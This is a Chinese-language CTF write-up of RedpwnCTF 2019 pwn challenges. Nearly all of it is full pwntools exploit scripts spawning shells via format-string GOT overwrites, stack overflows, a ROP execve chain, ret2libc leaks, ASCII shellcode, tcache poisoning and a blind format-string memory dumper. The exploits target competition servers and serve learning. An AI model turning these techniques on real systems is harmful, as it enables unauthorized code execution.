上周参加了一下这个比赛,谈不上好。
一共12道Pwn题,比赛时做了8个,赛后做出来两个简单记录下
BabbyPwn
签到题,nc过去就会输出flag
Rot26
程序将输入进行移位,rot26移位之后还是原字符,对输入没有什么影响
#!/usr/bin/env python
# rot26函数无效,格式化字符串漏洞修改exit的GOT表为预留shell地址
from pwn import *
#p = process('./rot26')
p = remote('chall.2019.redpwn.net',4003)
elf = ELF('./rot26')
winners_room = 0x8048737
offset = 7
payload = fmtstr_payload(offset, {elf.got['exit']:winners_room})
#print payload
p.sendline(payload)
p.interactive()
HARDMODE
#!/usr/bin/env python
from pwn import *
#p = process('./hardmode')
p = remote('chall.2019.redpwn.net',4002)
elf = ELF('./hardmode')
sh_addr = 0x0804866c
payload = 'A'*26 # padding
payload += 'bbbb' # fake var4
payload += 'cccc' # fake ebp
payload += p32(elf.plt['system']) # 调用system函数
payload += p32(0xdeadbeef) # 返回地址
payload += p32(sh_addr) # sh 字符串地址
p.recvuntil('Welcome to my fiendish little challenge\n')
p.sendline(payload)
p.interactive()
Bronze Ropchain
fgets函数遇到\x0a会被截断,ROPgadget生成chain的时候可以指定badbytes
ROPgadget --binary ./bronze_ropchain --badbytes "00|0a" --ropchain
#!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from struct import pack
# context.log_level = 'debug'
# Padding goes here
p = ''
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += '/bin'
p += pack('<I', 0x080da060) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da064) # @ .data + 4
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += '//sh'
p += pack('<I', 0x080da064) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x0806ef52) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080da060) # padding without overwrite ebx
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x080495b3) # int 0x80
payload = 'A'*28 + p
#r = process('bronze_ropchain')
r = remote('chall.2019.redpwn.net',4004)
r.recvuntil('What is your name?\n')
#gdb.attach(r)
r.sendline(payload)
r.sendline('')
r.interactive()
Zipline
#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
zipline = 0x80494CE
#p = process('zipline')
p = remote('chall.2019.redpwn.net',4005)
elf = ELF('zipline')
payload = 'A'*22 +p32(elf.plt['puts']) + p32(zipline) + p32(elf.got['puts'])
p.recvuntil('Ready for a ride on the zipline to hell?\n')
p.sendline(payload)
puts_addr = u32(p.recv(4))
# leak
obj = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - obj.dump("puts")
sys_addr = libc_base + obj.dump("system")
binsh_addr = libc_base + obj.dump("str_bin_sh")
print hex(libc_base)
payload = 'A'*22 + p32(sys_addr) + p32(0xdeadbeef) + p32(binsh_addr)
p.sendline(payload)
p.interactive()
Stop,ROP,n',Roll
看flag预期解应该是srop,不过ret2libc也能做....
#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#p = process('srnr')
p = remote('chall.2019.redpwn.net',4008)
elf = ELF('./srnr')
main = 0x00000000040073B
pop_rdi = 0x0000000000400823
pop_rsi_r15 = 0x0000000000400821
bss = 0x602048
#p.recv()
p.recvuntil('[#] number of bytes: ')
p.sendline('0')
payload = 'A'*9 + 'bbbbbbbb' +p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(bss) + p64(0xdeadbeef) + p64(elf.plt['read']) + p64(main)
p.send(payload)
#gdb.attach(p)
p.send(r'%s')
#p.recv()
p.recvuntil('[#] number of bytes: ')
p.sendline('0')
payload = 'A'*9 + 'bbbbbbbb' +p64(pop_rdi) + p64(bss) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0xdeadbeef) + p64(elf.plt['printf']) + p64(main)
#gdb.attach(p)
p.send(payload)
read_addr = u64(p.recv(6).ljust(8,'\x00'))
obj = LibcSearcher("read",read_addr)
libc_base = read_addr - obj.dump("read")
system_addr = libc_base + obj.dump("system")
bin_sh_addr = libc_base + obj.dump("str_bin_sh")
p.recvuntil('[#] number of bytes: ')
p.sendline('0')
payload = 'A'*9 + 'bbbbbbbb' +p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)
p.send(payload)
p.interactive()
Dennis Says
程序预留了Arbitrary write,leak出libc base后直接修改fputs@GOT为system address
#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
R = 1
if R:
p = remote('chall.2019.redpwn.net',4006)
libc = ELF('libc-2.23.so')
else:
p = process('dennis')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
elf = ELF('dennis')
def greet(size):
p.recvuntil('Command me: ')
p.sendline('1')
p.recvuntil('How much greet? : ')
p.sendline(str(size))
def writ(size):
p.recvuntil('Command me: ')
p.sendline('2')
p.recvuntil('How much writ? : ')
p.sendline(str(size))
def yeet():
p.recvuntil('Command me: ')
p.sendline('3')
def eat(content):
p.recvuntil('Command me: ')
p.sendline('4')
p.recvuntil('Pizza: ')
p.sendline(content)
def delet():
p.recvuntil('Command me: ')
p.sendline('5')
def repeat():
p.recvuntil('Command me: ')
p.sendline('6')
p.recvuntil("Dennis repeat\n")
p.sendline('/bin/sh\x00')
spm = 0x0804B050
greet(16)
payload = p32(elf.got['puts']) + p32(spm)
eat(payload)
yeet()
writ(4)
puts_addr = u32(p.recv(4))
print hex(puts_addr)
#gdb.attach(p)
libc_base = puts_addr - libc.symbols['puts']
log.success("libc_base => %s" % hex(libc_base))
sys_addr = libc_base + libc.symbols['system']
greet(16)
#gdb.attach(p)
payload = p32(sys_addr) + p32(elf.got['fputs'])
eat(payload)
yeet()
repeat()
p.interactive()
Knuth
蛮有意思的ascii shellcode
#!/usr/bin/env python
from pwn import *
from time import sleep
#context.log_level = 'debug'
#p = process('knuth')
p = remote('chall.2019.redpwn.net',4009)
shellcode = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH"
shellcode +="0A00ABAABTAAQ2AB2BB0BBXP8ACJJ"
shellcode +="ISZTK1HMIQBSVCX6MU3K9M7CXVOSC"
shellcode +="3XS0BHVOBBE9RNLIJC62ZH5X5PS0C"
shellcode +="0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA"
p.recv()
sleep(1)
p.recv()
p.sendline(shellcode)
p.interactive()
Penpal World
uaf+double free+tcache_poisoning的综合利用,tcache的简单题
#!/usr/bin/env python
from pwn import *
#context.log_level = 'debug'
def add(idx):
p.recvuntil("4) Read a postcard\n")
p.sendline('1')
p.recvuntil('Which envelope #?\n')
p.sendline(str(idx))
def Del(idx):
p.recvuntil('4) Read a postcard\n')
p.sendline('3')
p.recvuntil('Which envelope #?\n')
p.sendline(str(idx))
def edit(idx,content):
p.recvuntil('4) Read a postcard\n')
p.sendline('2')
p.recvuntil('Which envelope #?\n')
p.sendline(str(idx))
p.recvuntil('Write.\n')
p.sendline(content)
def show(idx):
p.recvuntil('4) Read a postcard\n')
p.sendline('4')
p.recvuntil('Which envelope #?\n')
p.sendline(str(idx))
p = process('penpal_world')
# p = remote('127.0.0.1',8888)
# elf = ELF('penpal_world')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
add(0)
Del(0)
Del(0)
#gdb.attach(p)
show(0)
heap_base = u64(p.recv(6).ljust(8,"\x00"))-0x260
log.info("heap_base ==> %s" % hex(heap_base))
#gdb.attach(p)
edit(0,p64(heap_base+0x10))
add(0)
add(1)
Del(0)
Del(0)
for i in range(8):
Del(1)
show(1)
libc_base = u64(p.recv(6).ljust(8,"\x00"))-(0x00007f7e41e32ca0-0x7f7e41a47000)
log.info("libc_base ==> %s" % hex(libc_base))
#gdb.attach(p)
malloc_hook = libc_base + libc.symbols['__malloc_hook']
log.info("__malloc_hook ==> %s" % hex(malloc_hook))
one_gadget = libc_base + 0x10a38c
log.success("one_gadget ==> %s" % hex(one_gadget))
edit(0,p64(malloc_hook))
add(0)
add(0)
edit(0,p64(one_gadget))
add(0)
#gdb.attach(p)
p.interactive()
Black Echo
Blind fmt
先dump下来binary,但是dump内存的时候有个坑,server端用的fgets函数遇到换行时会截断,也就是说地址包含0xa的时候dump不到memory,这个比赛当时没有做出来,赛后参考别人的writeup进行了复现
dump.py:
#!/usr/bin/python
from pwn import *
import binascii
r = remote('127.0.0.1',8888)
binary = ''
out = ''
x=0x8049000
while x < x+0x2000:
address = "0%x" % x
if ('\n' in binascii.unhexlify(address)):
out = 'a'
binary += '\x00'
else:
r.sendline("%9$s"+"ssta"+p32(x))
out = r.recvuntil('ssta',drop=True)
log.info("%s ==> %s" %(address,out))
r.recv(timeout=1)
if out == '':
out = 'a'
binary += '\x00'
else:
binary += out
with open('bin','wb+') as f:
f.write(binary)
x += len(out)
https://teamrocketist.github.io/2019/08/17/Pwn-RedpwnCTF-Black-Echo/
dump下来binary之后找到printf、fgets等函数的GOT地址,之后是常规操作
from pwn import *
from LibcSearcher import *
# context.log_level = 'debug'
p = remote('127.0.0.1',8888)
got_fgets = 0x804A014
got_printf = 0x804A010
offset = 7
payload = "%9$s"+"ssta"+p32(got_fgets)
p.sendline(payload)
fgets_addr = u32(p.recv(4))
log.success("fgets_addr ==> %s" % hex(fgets_addr))
obj = LibcSearcher("fgets",fgets_addr)
libc_base = fgets_addr-obj.dump('fgets')
log.success("libc base ==> %s" % hex(libc_base))
system_addr = libc_base + obj.dump("system")
log.success("system_addr ==> %s" % hex(system_addr))
payload = fmtstr_payload(offset, {got_printf:system_addr})
p.sendline(payload)
p.recv()
p.sendline("/bin/sh\x00")
p.interactive()
